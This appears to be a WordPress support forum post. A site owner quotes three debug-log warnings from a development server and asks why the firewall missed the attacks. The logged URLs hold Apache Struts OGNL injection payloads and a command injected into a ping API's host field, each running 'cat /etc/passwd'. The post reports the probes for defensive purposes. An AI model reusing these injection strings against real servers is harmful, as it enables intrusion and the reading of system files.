Attacks not prevented
-
Hi. I found traces of three attacks in my wp-content/debug.log file on a development system we have. They are shown below. My concern is: why didn’t the WAF catch these? They were eventually detected by the scanner.
[22-May-2023 21:51:08 UTC] PHP Warning: file_put_contents(/www/devph_206/public/wp-content/cache/flying-press/www.acornfinance.com//devmode.actionindex-debug=command-expression=(#_memberAccess[“allowStaticMethodAccess”]=true,#foo=new java.lang.Boolean(“false”) ,#context[“xwork.MethodAccessor.denyMethodExecution”]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘cat /etc/passwd’).getInputStream())).html): Failed to open stream: File name too long in /www/devph_206/public/wp-content/plugins/flying-press/src/Caching.php on line 106
[22-May-2023 21:52:58 UTC] PHP Warning: file_put_contents(/www/devph_206/public/wp-content/cache/flying-press/www.acornfinance.com//index.actionindex-cmd=cat /etc/passwd-encoding=UTF-8-method:#_memberAccess=@ognl_OgnlContext@DEFAULT_MEMBER_ACCESS,#res=@org_apache_struts2_ServletActionContext@getResponse(),#res_setCharacterEncoding(#parameters_encoding=Array-ppp= .html): Failed to open stream: No such file or directory in /www/devph_206/public/wp-content/plugins/flying-press/src/Caching.php on line 106
[22-May-2023 21:53:03 UTC] PHP Warning: file_put_contents(/www/devph_206/public/wp-content/cache/flying-press/www.acornfinance.com//api/pingindex-count=5-host=cat /etc/passwd-port=80-source=1.1.1.1-type=icmp.html): Failed to open stream: No such file or directory in /www/devph_206/public/wp-content/plugins/flying-press/src/Caching.php on line 106
The page I need help with: [log in to see the link]
- The topic ‘Attacks not prevented’ is closed to new replies.